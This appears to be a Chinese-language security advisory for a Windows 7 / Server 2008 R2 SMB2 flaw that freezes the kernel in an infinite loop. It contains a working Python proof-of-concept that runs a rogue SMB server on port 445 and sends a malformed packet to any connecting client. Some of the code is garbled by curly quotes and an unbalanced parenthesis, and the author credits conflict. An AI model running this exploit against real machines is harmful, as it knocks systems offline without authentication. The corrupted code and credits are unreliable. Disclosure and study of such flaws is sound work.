漏洞起因
设计错误
影响系统
Windows 7, Windowns Server 2008R2
不受影响系统
危害
远程攻击者可以利用漏洞使系统停止响应。
攻击所需条件
攻击者必须访问Microsoft Windows 7/Server 2008R2所在网段,或关键恶意WEB页,诱使用户使用IE访问。
漏洞信息
Microsoft Windows 7/Server 2008R2是微软公司提供的最新的操作系统。
Microsoft Windows 7/Server 2008R2 NT_ASSERT()/DbgRaiseAssertionFailure()存在错误,可触发无限循环而造成KeAccumulateTicks()崩溃。
漏洞可在smb{1,2}上触发一个无限循环,不需要提供任何验证信息,问题代码如下:
netbios_header = struct.pack(">i", len(”.join(SMB_packet))+SMB_packet
(netbios头字段提供入站smb{1,2}报文的长度)
如果netbios_header小于4字节或小于SMB_packet,可触发此漏洞。
攻击者可以通过IE或通过广播NBNS(无需用户交互)使使用防火墙的用户也受此漏洞影响。
测试方法
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an #infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#
import SocketServer
packet = "\x00\x00\x00\x9a" # —> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
class SMB2(SocketServer.BaseRequestHandler):
def handle(self):
print "Who:", self.client_address
print "THANKS SDL"
input = self.request.recv(1024)
self.request.send(packet)
self.request.close()
launch = SocketServer.TCPServer((”, 445),SMB2)# listen all interfaces port 445
launch.serve_forever()
厂商解决方案
目前没有详细解决方案提供:
http://www.microsoft.com
漏洞提供者
Laurent Butti
0 条评论。